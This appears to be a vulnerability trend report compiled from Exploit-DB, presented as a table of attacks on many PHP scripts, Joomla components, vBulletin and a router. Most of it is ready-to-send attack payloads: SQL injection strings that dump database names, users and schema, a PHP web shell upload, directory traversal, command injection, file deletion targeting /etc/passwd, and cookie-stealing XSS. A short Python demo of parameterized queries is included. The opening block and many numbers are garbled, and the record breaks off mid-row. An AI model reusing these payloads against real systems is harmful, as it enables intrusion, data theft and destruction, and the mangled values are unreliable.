- 'show_id' / 'pid' /tradeshow-list-detail.php?show_id=- '++UNION+ALL+SELECT+,(/*!Select*/+export_set(5,@:=0,(/*!select*/+count(*)/*!from*/(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,/*! Advance BB Script Advance BB Script.. table_name*/,0xc6c69e,),/*!column_name* /,0xaa,)),@,)),,4,5,6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6,7,8,9,0,,,,4,5,6,7, 8,9,40,4,4,4,44,45,46,47,48,49,50,5,5,5,54,55,56,5 7,58,59,60,6,6,6,64,65,66,67-- 07--09 464 SQL Injection 中早急対応要 Advance Online Learning Management Script. - 'subcatid' / 'popcourseid' /courselist.php?subcatid=- 9'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),CONCAT_WS(0x0a0 Advance Online Learning,USER(),DATABASE(),VERSION()),(),(),(),(4),(5),(6), Management Script (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9)) -- Advance Online Learning Management Script. 07--09 465 SQL Injection 易早急対応要 07--09 466 SQL Injection 中早急対応要 Affiliate MLM Script.0 - 'product-category.php?key' Basic BB Script.0.8 - 'product_details.php?id' /product-category.php?key=a%' AND 546=546 AND '%'=' Affiliate MLM Script Affiliate MLM Script.0 /product_details.php?id=- 48'++/*!7UNION*/+/*!7SELECT*/+,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,0 Basic BB Script Basic BB Script.0.8,,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4--

最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 07--09 467 SQL Injection 中早急対応要 Beauty Parlour Booking Script.0 - 'gender' / 'city' /beautyparloursearch/list?gender='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,, Beauty Parlour Booking Script Beauty Parlour Booking Script.0,4,5,6,7,8,9,0,,,CONCAT_WS(0x0a0,USER (),DATABASE(),VERSION()),4,5,6,7,8,9,40,4,4,4,4 4,45,46,47,48,49,50,5,5--+-&main_search= 07-- 480 SQL Injection 中早急対応要 Facebook Clone Script.0 - 'id' / 'send' /friend-profile.php?id=- '++/*!UNION*/(SELECT(),CONCAT_WS(0x0a0,U Facebook Clone Script Facebook Clone Script.0 SER(),DATABASE(),VERSION()))-- 07-- 48 SQL Injection 中早急対応要 Food Order Script.0 - 'list?city' /list?city='++union(select(),(),(),(4),(5),(6),(7),(8),(9),(0 ),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),( ),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),( Food Order Script Food Order Script.0 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5 ),(5))--+-&main_search= 07-- 48 SQL Injection 中早急対応要 Yoga Class Script.0 - 'list?city' /list?city=- '+/*!0UNION*/+/*!0SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Yoga Class Script Yoga Class Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--+-&main_search= 07-- 48 SQL Injection 中早急対応要 Freelance Website Script.0.6 - 'pr_id' / 'catid' /jobdetails.php?pr_id=- '++UNION(SELECT(),(),(),(4),(5),(/*!08888Select*/+expor t_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(inf ormation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!08888table_name*/,0xc6c69e,),/*!08888column_ name*/,0xaa,)),@,)),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 Freelance Website Script Freelance Website Script.0.6 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 
),(55),(56),(57),(58),(59),(60),(6),(6),(6),(64),(65),(66),(67 ),(68),(69),(70),(7),(7),(7),(74),(75),(76),(77),(78),(79),(80 ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ),(94),(95),(96),(97),(98),(99),(00))--+- 07-- 484 SQL Injection 中早急対応要 Hot Scripts Clone. - 'subctid' / 'mctid' /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELEC T(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCH EMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6 74696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,L PAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67 e))))x)-- Hot Scripts Clone Hot Scripts Clone. 07-- 485 SQL Injection 中早急対応要 Foodspotting Clone Script.0 - 'quicksearch.php?q' /quicksearch.php?q=- '++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 Foodspotting Clone Script Foodspotting Clone Script.0 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(0),())-- 07-- 486 SQL Injection 易早急対応要 07-- 487 SQL Injection 中早急対応要 Kickstarter Clone Acript.0 - 'projid' Secure E-commerce Script.0. - 'searchcat' / 'searchmain' /investcalc.php?price=&projid=%0and%0=-- Kickstarter Clone Acript Kickstarter Clone Acript.0 /category.php?searchmain='++/*!50000union*/+/*!50000 SELECT*/+,version(),,4,5,6,7,8,9,0,,,,4,5,6,7, Secure E-commerce Script Secure E-commerce Script.0. 8,9--+- 07-- 488 SQL Injection 中早急対応要 Laundry Booking Script.0 - 'list?city' /laundry-search/list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Laundry Booking Script Laundry Booking Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,5 0,5,5,5--+-&main_search= 07-- 489 SQL Injection 中早急対応要 Lawyer Search Script. 
(Table continued from the previous page. Columns: Date | EDB-ID | Vulnerability type | Attack difficulty (易 = Easy, 中 = Medium, 難 = Hard) | Risk (早急対応要 = Urgent action required, 高 = High, 中 = Medium); then the target product and version, then the attack code as published on Exploit-DB.)

Target: Lawyer Search Script (version .) - 'lawyer-list?city'   (date, EDB-ID and ratings for this row are on the previous page)
Attack code:
  /lawyer-list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--+-&main_search=

Date 07-- | EDB-ID 490 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Multivendor Penny Auction Clone Script (version .0)
Attack code:
  /bidding/detail/- 48++UNION(SELECT(),(),(),(4),(5),(6),(7),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9))--

Date 07-- | EDB-ID 49 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Online Exam Test Application Script (version .6) - 'exams.php?sort'
Attack code:
  /exams.php?sort=- 4++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@x:=0x00),(@nr:=0),(select(0)from(information_schema.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d674696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67e))))x),5,6--+-

Date 07-- | EDB-ID 49 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Opensource Classified Ads Script (version .)
Attack code:
  POST /advance_result.php HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''='

Date 07-- | EDB-ID 49 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: PHP Multivendor Ecommerce (version .0) - 'sid' / 'searchcat' / 'chid'
Attack code:
  /single_detail.php?sid= AND 4059=4059

Date 07-- | EDB-ID 494 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Professional Service Script (version .0) - 'service-list?city'
Attack code:
  /servicelist?city='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--+-&main_search=

Date 07-- | EDB-ID 495 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Readymade PHP Classified Script (version .) - 'subctid' / 'mctid'
Attack code:
  /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d674696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67e))))x)--

Date 07-- | EDB-ID 496 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Readymade Video Sharing Script (version .)
Attack code:
  /single-video-detail.php?video_id=mtmy&report_videos[]=' AND ELT(7764=7764,974) AND 'BZFh'='BZFh&report_submit=

Date 07-- | EDB-ID 497 | SQL Injection | Attack difficulty: Easy | Risk: Urgent action required
Target: Responsive Realestate Script (version .) - 'property-list?tbud'
Attack code:
  /property-list?tbud=500-0000 AND 479=479&quicksrch=

Latest Web Vulnerability Trend Report (07.) 07..0~07.. : vulnerability trend information based on content published on Exploit-DB (http://exploit-db.com)

Date 07-- | EDB-ID 499 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Multireligion Responsive Matrimonial (version 4.7.) - 'succid'
Attack code:
  /success-story.php?succid=- 6++/*!0UNION*/(/*!0SELECT*/+0x89,0x89,0x89,0x849,0x859,0x869,0x879,0x889,(/*!0select*/+export_set(5,@:=0,(/*!0select*/+count(*)/*!0from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!0table_name*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),0x809,0x89,0x89,0x89,0x849,0x859,0x869,0x879,0x889,0x899)--

Date 07-- | EDB-ID 400 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Responsive Events & Movie Ticket Booking Script (version ..) - 'findcity.php?q'
Attack code:
  /findcity.php?q=s'+/*!0union*/+/*!0select*/+0x,0x,0x,(/*!0select*/+export_set(5,@:=0,(/*!0select*/+count(*)/*!0from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!0table_name*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),0x5,0x6,0x7,0x8,0x9,0x0,0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9,0x0--

Date 07-- | EDB-ID 40 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Multiplex Movie Theater Booking Script (version ..5) - 'moid' / 'eid'
Attack code:
  /show-time.php?moid=- 0'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x746966b65745f6646d696e)AND(0x00)IN(@x:=concat(@x,concat(lpad(@nr:=@nr+,,0x0),0xa0,column_name,0xc67e)))))x),(),(4),(5),(6),(7),(8),(9),(0),(),(),())--

Date 07-- | EDB-ID 40 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Single Theater Booking Script (version ..) - 'findcity.php?q'
Attack code:
  /findcity.php?q=s'++/*!0union*/+/*!0select*/+,,,(/*!0select*/+export_set(5,@:=0,(/*!0select*/+count(*)/*!0from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!0table_name*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),5--+-

Date 07-- | EDB-ID 404 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Advanced Real Estate Script (version 4.0.7)
Attack code:
  /search-results.php?projectmain=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(/*!0Select*/+export_set(5,@:=0,(/*!0select*/+count(*)/*!0from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!0table_name*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49))--+-&search=

Date 07-- | EDB-ID 405 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Entrepreneur Bus Booking Script (version .0.4) - 'sourcebus'
Attack code:
  /booker_details.php?sourcebus=- ++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!09999column_name*/,0xaa,)),@,))--+-

Date 07-- | EDB-ID 406 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: MLM Forex Market Plan Script (version .0.4) - 'newid' / 'eventid'
Attack code:
  /news_detail.php?newid=- 7'++/*!06666UNION*/(/*!06666SELECT*/+0x89,0x4948544e05454e444e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0xc6c69e,),/*!06666column_name*/,0xaa,)),@,)),0x849,0x859,0x869)--+-

Date 07-- | EDB-ID 407 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: MLM Forced Matrix (version .0.9) - 'newid'
Attack code:
  /news-detail.php?newid=- 7'++/*!00008UNION*/(/*!00008SELECT*/+0x89,0x4948544e05454e444e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0xc6c69e,),/*!00008column_name*/,0xaa,)),@,)),0x849,0x859,0x869)--+-

Date 07-- | EDB-ID 408 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Car Rental Script (version .0.4) - 'val'
Attack code:
  /countrycode.php?val=- '++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-

Date 07-- | EDB-ID 409 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Groupon Clone Script (version .0) - 'state_id' / 'search'
Attack code:
  /city_ajax.php?state_id=- '++/*!09999UNION*/+/*!09999SELECT*/+0x,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!09999column_name*/,0xaa,)),@,))--+-

Date 07-- | EDB-ID 40 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Muslim Matrimonial Script (version .0) - 'succid'
Attack code:
  /success-story.php?succid=- ++/*!04444UNION*/+/*!04444SELECT*/+0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9,(SELECT(@x)FROM(SELECT(@x:=0x00),(@nr:=0),(select(0)from(information_schema.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d674696f6e5f7668656d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e))))x),0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9--+-

Date 07-- | EDB-ID 4 | SQL Injection | Attack difficulty: Easy | Risk: Urgent action required
Target: Advanced World Database (version .0.5)
Attack code:
  /state.php?country=russian Federation' AND 69=69 AND 'kvcm'='kvcm&state=moskva

Date 07-- | EDB-ID 4 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Resume Clone Script (version .0.5)
Attack code:
  /preview.php?id=- ++/*!08888UNION*/(/*!08888SELECT*/+0x89,0x89,0x89,0x849,0x859,0x869,0x879,0x889,0x899,CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),0x89,0x89,0x89,0x849)--+-

Date 07-- | EDB-ID 44 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Basic Job Site Script (version .0.5)
Attack code:
  POST /onlinejobsearch/job HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''='

Date 07-- | EDB-ID 46 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Vanguard (version .4)
Attack code:
  /p/'++/*!50000union*/+/*!50000select*/+%c(/*!08888Select*/+export_set(5%c@:=0%c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%cexport_set(5%c@%c/*!08888table_name*/%c0xc6c69e%c)%c/*!08888column_name*/%c0xaa%c))%c@%c))%c%c4%c5%c6%c7%c8%c9%c0%c%c%c%c4%c5%c6%c7%c8%c9%c0%c%c%c%c4%c5%c6%c7%c8%c9%c0%c%c%c--+-

Date 07-- | EDB-ID 4 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component JBuildozer (version .4.) - 'appid'
Attack code:
  /index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=&appid=%0%0%f*!05555procedure*%f%0%f*!05555analyse*%f%0%8extractvalue(0%c%f*!05555concat*%f%80x7,0x4968766e05656e666e,0xa,@@version%9%9,0%9%d%d%0%d
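The SQL injection rows above share one root cause: a request parameter is pasted into the SQL text, so a quote in the parameter ends the string literal and the rest is parsed as SQL. The example below is added for this report's context; it is not code from the report, from Penta Security, or from any listed product. It uses a constructed in-memory SQLite schema (table and column names are assumptions) to show how a UNION payload and a boolean-oracle payload of the kinds listed above behave against a concatenated query and against the same query with a bound parameter.

```python
import sqlite3

# Constructed in-memory schema standing in for a "script" like those listed
# above: a public search table and a private users table the attacker wants.
# Table, column and row values are assumptions made for this example.
SCHEMA = """
CREATE TABLE lawyers (id INTEGER PRIMARY KEY, name TEXT, city TEXT);
CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO lawyers VALUES (1, 'A. Sato', 'Tokyo'), (2, 'B. Kim', 'Seoul');
INSERT INTO users   VALUES (1, 'admin', 'constructed-hash-value');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, city: str) -> list:
    """The pattern behind the UNION and boolean rows above: the request
    parameter is pasted into the SQL text, so quotes in it change the query."""
    sql = f"SELECT id, name, city FROM lawyers WHERE city = '{city}'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, city: str) -> list:
    """Same query with a bound parameter: the value is never parsed as SQL,
    so a payload is just an odd city name that matches nothing."""
    sql = "SELECT id, name, city FROM lawyers WHERE city = ?"
    return conn.execute(sql, (city,)).fetchall()


# Payloads shaped like the ones in the table: the UNION selects as many
# columns as the original SELECT list, and '--' comments out the trailing quote.
UNION_PAYLOAD = "' UNION SELECT id, username, password_hash FROM users--"
TRUE_PAYLOAD = "Tokyo' AND 4059=4059--"
FALSE_PAYLOAD = "Tokyo' AND 4059=4060--"


def demo() -> dict:
    conn = build_db()
    return {
        # UNION-based: the vulnerable query returns the users row outright.
        "union_vulnerable": search_vulnerable(conn, UNION_PAYLOAD),
        "union_safe": search_safe(conn, UNION_PAYLOAD),
        # Boolean-based: the row count differs between a true and a false
        # condition, which is the oracle that 'AND 4059=4059' style payloads use.
        "bool_true_vulnerable": len(search_vulnerable(conn, TRUE_PAYLOAD)),
        "bool_false_vulnerable": len(search_vulnerable(conn, FALSE_PAYLOAD)),
        "bool_true_safe": len(search_safe(conn, TRUE_PAYLOAD)),
        "bool_false_safe": len(search_safe(conn, FALSE_PAYLOAD)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The boolean case is the one worth noticing when reviewing code: neither payload returns an error, so the only sign of the injection is that the application's response differs between the two requests, which is exactly what rows such as 'sid= AND 4059=4059' exploit.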

Date 07-- | EDB-ID 44 | File Upload | Attack difficulty: Easy | Risk: Urgent action required
Target: Accesspress Anonymous Post Pro (version <..0) - Unauthenticated Arbitrary File Upload vulnerability
Attack code:
  POST /wp-admin/adminajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedextensions[]=php&sizelimit=64000 HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  -----------------------------705966098045779
  Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
  Content-Type: text/php
  <?php echo shell_exec($_get['e'].' >&');?>
  -----------------------------705966098045779--

Date 07-- | EDB-ID 49 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Question And Answer (version ..0)
Attack code:
  /index.php/en/component/jequestions/?view=tags&an=%dVerAyari'%0%f*!06666UNION*%f%0%f*!06666SELECT*/%0%c(SELECT%0GROUP_CONCAT(table_name%0SEPARATOR%00xc67e)%0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE%0TABLE_SCHEMA=DATABASE())%c%c4%c5%c6%c7%c8%c9%c0%c%c%c%c4%c5%c6%c7%c8%c9%c0%c%c%c%c4%c5%d%d%0%d

Date 07-- | EDB-ID 40 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Video Gallery (version .0.5) - 'id'
Attack code:
  /index.php?option=com_jevideogallery&view=category&id=99%0AND(SELECT%0%0FROM%0(SELECT%0COUNT(*),CONCAT((SELECT(SELECT%0CONCAT(CAST(DATABASE()%0AS%0CHAR)%c0x7e,0x4968766e5656e666e))%0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE%0table_schema=DATABASE()%0LIMIT%00,),FLOOR(RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.TABLES%0GROUP%0BY%0x)a)

Date 07-- | EDB-ID 46 | Directory Traversal | Attack difficulty: Hard | Risk: Urgent action required
Target: vbulletin (version 5) - 'routestring' Unauthenticated Remote Code Execution vulnerability
Attack code:
  /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log

Date 07-- | EDB-ID 46 | Command Injection | Attack difficulty: Hard | Risk: Urgent action required
Target: vbulletin (version 5) - 'cachetemplates' Unauthenticated Remote Arbitrary File Deletion vulnerability
Attack code:
  POST /vb5/ajax/api/template/cachetemplates HTTP/.
  Pragma: no-cache
  Cache-Control: no-cache
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0 0) AppleWebKit/57.6 (KHTML, like Gecko) Chrome/6.0.6.00 Safari/57.6
  Upgrade-Insecure-Requests:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: it-it,it;q=0.8,en-us;q=0.6,en;q=0.4
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 5
  templates[]=&templateidlist=o:0:"vb_image_imagemagick"::{s:0:"%00*%00imagefilelocation";s::"/etc/passwd";}

Date 07--4 | EDB-ID 4 | XSS | Attack difficulty: Easy | Risk: High
Target: Readymade Video Sharing Script (version .) - HTML Injection vulnerability
Attack code:
  /single-videodetail.php?video_id=mtmy&comment=<script>alert(document.cookie);</script>&comment_submit=

Date 07--4 | EDB-ID 44 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Paid To Read Script (version .0.5) - 'uid' / 'fnum' / 'fn'
Attack code:
  /admin/userview.php?uid=- 9++/*!08888UNION*/(/*!08888SELECT*/()%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(0)%c()%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(0)%c()%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(0)%c()%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(40)%c(4)%c(4)%c(4)%c(44)%c(45)%c(46)%c(47)%c(48)%c(/*!08888select*/+export_set(5%c@:=0%c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%cexport_set(5%c@%c/*!08888table_name*/%c0xc6c69e%c)%c/*!08888column_name*/%c0xaa%c))%c@%c))%c(50)%c(5)%c(5)%c(5)%c(54)%c(55)%c(56)%c(57)%c(58)%c(59)%c(60)%c(6)%c(6)%c(6)%c(64)%c(65)%c(66)%c(67)%c(68))--+-

Date 07--4 | EDB-ID 45 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: FS Lynda Clone (version .0)
Attack code:
  POST /tutorial/ HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  keywords=' and(select FROM(select count(*),concat((select (select concat(database(),0x7,0x7e,0x4948544e05454e444e)) FROM information_schema.tables LIMIT 0,),floor(rand(0)*))x FROM information_schema.tables GROUP BY x)a)-- -

Date 07--4 | EDB-ID 46 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Bus Booking Script (version .0) - 'txtname'
Attack code:
  POST /newbusbooking/admin/index.php HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  txtname=' UNION ALL SELECT 0x,0x5645504594549,0x,0x4,0x5--

Date 07--4 | EDB-ID 47 | SQL Injection | Attack difficulty: Easy | Risk: Urgent action required
Target: Piwigo (version .9.) - 'cat_true' / 'cat_false'
Attack code:
  POST /admin.php?page=cat_options&section=status HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  cat_false%5b%5d=%0and%0=--&trueify=%c%ab

Date 07--4 | EDB-ID 46 | Command Injection | Attack difficulty: Hard | Risk: Urgent action required
Target: Linksys WVBR0 - 'User-Agent' Remote Command Injection vulnerability
Attack code:
  GET / HTTP/.
  User-Agent: "; ls -al "admin

Date 07--5 | EDB-ID 44 | Command Injection | Attack difficulty: Hard | Risk: Urgent action required
Target: ITGuard-Manager (version 0.0.0.) - Remote Code Execution vulnerability
Attack code:
  POST /cgi-bin/drknow.cgi?req=login HTTP/.
  User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/6.0.9.75
  req=login&lang=kor&username= admin 'ls - al' x&password=admin

Date 07--5 | EDB-ID 446 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Movie Guide (version .0)
Attack code:
  /index.php?md=%dv'%0%0%f*!0union*%f(%f*!0select*%f%00x58559%c0x58559%c(%f*!0Select*%f%0export_set(5%c@:=0%c(%f*!0select*%f%0count(*)%f*!0from*%f(information_schema.columns%9where@:=export_set(5%cexport_set(5%c@%c%f*!0table_name*%f%c0xc6c69e%c)%c%f*!0column_name*%f%c0xaa%c))%c@%c))%c0x585459%c0x585559%c0x585659%c0x585759%c0x585859%c0x585959%c0x5855059%c0x585559%c0x585559)%d%d%0%d

Date 07--8 | EDB-ID 449 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Cells Blog (version .5) - 'bgid' / 'fmid' / 'fnid'
Attack code:
  /pub_post.php?bgid=45&fmid=- 7+UNION%0SELECT+0x5%c0x5%c0x5%c0x54%c0x55%c0x56%c0x57%c0x58%c%9%c0x550%c0x55%c0x55%c0x55%c0x554%c0x555%c0x556%c0x557%c0x558%c0x559%d%d%0%d

Date 07--8 | EDB-ID 450 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component JB Visa (version .0) - 'visatype'
Attack code:
  /index.php?option=com_bookpro&view=popup&visatype=59999%0AND(SELECT%0%0FROM%0(SELECT%0COUNT(*)%cCONCAT((SELECT(SELECT%0CONCAT(CAST(DATABASE()%0AS%0CHAR)%c0x7e%c0x4968766e5656e666e))%0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE%0table_schema=DATABASE()%0LIMIT%00%c)%cFLOOR(RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.TABLES%0GROUP%0BY%0x)a)

Date 07--8 | EDB-ID 45 | SQL Injection | Attack difficulty: Medium | Risk: Urgent action required
Target: Joomla! Component Guru Pro - 'promocode'
Attack code:
